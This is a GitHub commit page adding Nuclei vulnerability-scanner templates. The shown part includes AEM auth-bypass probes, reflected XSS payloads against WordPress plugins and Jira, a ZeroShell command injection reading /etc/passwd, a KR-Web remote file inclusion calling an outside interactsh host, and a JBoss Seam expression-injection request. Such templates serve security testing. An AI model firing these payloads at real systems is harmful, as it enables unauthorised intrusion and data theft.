forked from coolboy0816/pxplan
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #1 from BabelQwerty/dev
add some nuclei pocs
- Loading branch information
Showing
521 changed files
with
19,167 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
id: aem-misconfigs | ||
|
||
info: | ||
name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with | ||
author: panch0r3d | ||
severity: high | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css" | ||
- "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js" | ||
- "{{BaseURL}}/crx/de/index.jsp?.js" | ||
- "{{BaseURL}}/crx/explorer/browser/index.jsp?.css" | ||
- "{{BaseURL}}/crx/packmgr/index.jsp?.json" | ||
- "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html" | ||
- "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js" | ||
- "{{BaseURL}}/libs/granite/core/content/login.html?.ico" | ||
- "{{BaseURL}}/etc/reports/diskusage.html?.html" | ||
- "{{BaseURL}}///crx///de///index.jsp?.css" | ||
- "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html" | ||
headers: | ||
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- '(success).*?["][:](true).*?["](results)' | ||
- '(CRXDE).(Lite)' | ||
- '(Content).(Explorer)' | ||
- '(CRX).(Package).(Manager)' | ||
- '(Adobe)' | ||
part: body |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
id: cve-2005-2428 | ||
info: | ||
name: Lotus Domino Sensitive Information Leak | ||
risk: Medium | ||
|
||
params: | ||
- root: '{{.BaseURL}}' | ||
|
||
requests: | ||
- method: GET | ||
redirect: false | ||
url: >- | ||
{{.root}}/names.nsf/People?OpenView | ||
headers: | ||
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 | ||
detections: | ||
- >- | ||
StatusCode() == 200 && RegexSearch('resBody', '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)') | ||
reference: | ||
- link: https://www.cvebase.com/cve/2005/2428 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2007-0885 | ||
|
||
info: | ||
name: Rainbow.Zen Jira XSS | ||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. | ||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded | ||
author: geeknik | ||
severity: medium | ||
tags: cve,cve2007,jira,xss | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "\"><script>alert('{{randstr}}')</script>" | ||
- type: status | ||
status: | ||
- 200 | ||
- type: word | ||
part: header | ||
- "text/html" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
id: CVE-2009-0545 | ||
|
||
info: | ||
name: ZeroShell <= 1.0beta11 Remote Code Execution | ||
author: geeknik | ||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. | ||
reference: https://www.exploit-db.com/exploits/8023 | ||
severity: critical | ||
tags: cve,cve2009,zeroshell,kerbynet,rce | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "root:[x*]:0:0:" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2009-4223 | ||
|
||
info: | ||
name: KR-Web <= 1.1b2 RFI | ||
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. | ||
reference: | ||
- https://sourceforge.net/projects/krw/ | ||
- https://www.exploit-db.com/exploits/10216 | ||
author: geeknik | ||
severity: high | ||
tags: cve,cve2009,krweb,rfi | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=https://{{interactsh-url}}/file.txt" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "http" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
id: cve-2010-1871 | ||
info: | ||
name: JBoss Seam 2 Code Execution | ||
risk: High | ||
|
||
params: | ||
- root: '{{.BaseURL}}' | ||
|
||
variables: | ||
- endpoint: | | ||
seam-booking/home.seam | ||
requests: | ||
- method: GET | ||
redirect: false | ||
url: >- | ||
{{.root}}/{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]} | ||
headers: | ||
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 | ||
detections: | ||
- >- | ||
StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=") | ||
references: | ||
- https://www.cvebase.com/cve/2010/1871 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4618 | ||
|
||
info: | ||
name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4624 | ||
|
||
info: | ||
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-4926 | ||
|
||
info: | ||
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5107 | ||
|
||
info: | ||
name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5179 | ||
|
||
info: | ||
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5181 | ||
|
||
info: | ||
name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
id: CVE-2011-5265 | ||
|
||
info: | ||
name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "<script>alert(123)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
Oops, something went wrong.